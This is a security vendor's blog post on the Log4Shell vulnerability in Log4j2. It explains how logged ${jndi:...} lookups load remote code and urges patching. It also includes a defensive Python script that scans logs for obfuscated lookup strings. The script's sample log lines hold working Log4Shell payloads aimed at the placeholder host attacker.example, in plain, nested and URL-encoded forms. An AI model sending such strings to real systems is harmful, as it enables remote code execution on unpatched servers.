Germany's National Cybersecurity Agency declares red alert: Wave of attacks possibly imminent due to Log4Shell vulnerability

16/12/2021
G DATA Blog

The remaining days before Christmas will not be relaxing ones for IT and IT security managers in companies around the world: The Log4Shell security vulnerability is currently keeping the IT world on tenterhooks.

The vulnerability (Log4Shell, CVE-2021-44228) allows attackers to execute arbitrary code on their victims' systems if an affected version of Log4j2 is in use. To make matters worse, it can be exploited with a single crafted string and therefore requires very little expertise. Germany's National Cybersecurity Agency (BSI) further warns of the consequences of the flaw.

The Java library Log4j2, which is used to write logs in Java applications, is affected. The library is considered a de facto standard, as it is used in millions of applications. For exploitation it is sufficient that attacker-controlled input, for example an HTTP header or a user name, ends up in a log statement: affected versions resolve lookup expressions of the form ${jndi:...} that are embedded in the logged string.

Once such a string has been logged, the lookup contacts the remote server named in it, and that server only needs to point to a small exploit file on a remote web resource for the attack to succeed. Log4j2 does not verify where that code comes from, so resources outside the victim's own infrastructure are accepted and the attacker's code runs on the logging system.

Anyone using Java applications with Log4j2 should therefore apply available patches immediately. Even if no attack has been detected so far, it is recommended to have a qualified IT service provider assess whether the network has been compromised. Due to the ease of exploitation, it is to be expected that criminals will first compromise hundreds of thousands of systems and then begin to monetize these infections in a few weeks, for example by installing ransomware.
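A cheap first triage step for the assessment recommended above is to search web server and application logs for the lookup strings described earlier, including the obfuscated spellings that scanners use to slip past a plain "${jndi:" grep. The following Python script is an added example for this page, not G DATA's or the Log4j project's code. The log lines are constructed for illustration, "attacker.example" is a placeholder host, and the de-obfuscation deliberately covers only URL encoding and the lower/upper and default-value lookup forms; other lookup tricks exist, so a miss here is not proof of a clean log.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real incident). Lines 2-5
# carry a JNDI lookup in various disguises; lines 1 and 6 are benign, and
# line 6 shows that a plain "jndi" substring alone must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:13:44 +0000] "GET /login HTTP/1.1" 200 77 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [13/Dec/2021:10:14:02 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.7 - - [13/Dec/2021:10:15:30 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '10.0.0.3 - - [13/Dec/2021:10:16:00 +0000] "POST /search HTTP/1.1" 200 300 "-" "jndi-client/1.0"',
]

# ${lower:x} / ${upper:x} evaluate to x with changed case; attackers use them
# to spell "jndi" one letter at a time.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${key:-default} evaluates to the default when the key is unknown or empty,
# so ${::-j} and ${env:NOPE:-j} both become "j".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# What we are actually looking for once the disguises are peeled off.
_JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and collapse nested Log4j lookups until the text stops
    changing, so a hidden '${jndi:' surfaces as a literal substring."""
    for _ in range(max_rounds):
        previous = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == previous:
            break
    return text


def find_lookup_attempts(lines):
    """Return (line_number, normalized_line) for every line that contains a
    JNDI lookup after de-obfuscation. Line numbers are 1-based."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if _JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits


def flagged_line_numbers(lines=SAMPLE_LOG_LINES):
    """Convenience wrapper: just the 1-based numbers of the flagged lines."""
    return [number for number, _ in find_lookup_attempts(lines)]


if __name__ == "__main__":
    for number, normalized in find_lookup_attempts(SAMPLE_LOG_LINES):
        print(f"line {number}: {normalized}")
```

Run it against real logs by replacing SAMPLE_LOG_LINES with the lines of a file; a hit only shows that someone sent a lookup string, not that the lookup succeeded, so follow up on the flagged hosts with outbound LDAP/RMI connection records and process telemetry from the same time window.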

Logging is an essential component of all complex programs and libraries. The logging library Log4j2 can therefore be considered a de facto standard. In addition, programs rely on and reference existing programs and libraries. For developers, it is not sufficient to just update the Log4j2 they might have included in their own code; they must also analyze whether references to further libraries and programs using Log4j2 exist, and these must be patched as well. For this reason, virtually every Java application is affected by the vulnerability. Apache servers alone (also affected by Log4Shell) are utilized by about one third of all websites worldwide.

Karsten Hahn

Virus Analyst G DATA CyberDefense

The coming weeks are therefore likely to keep IT departments extremely busy.

Update

On our own behalf: G DATA has taken note of the reports regarding the security vulnerability in Log4j. We have been working constantly at full speed to secure or isolate all affected systems. Our customers are not affected, as G DATA clients as well as G DATA update servers do not make use of Log4j2. All of G DATA's infrastructure has been successfully patched by now. Since Log4j is included in a very large number of applications, in some minor cases dependency checks are still in progress, and we are currently further evaluating vendor information. We are working to have this process completed as quickly as possible.

Hauke Gierow
Head of Corporate Communications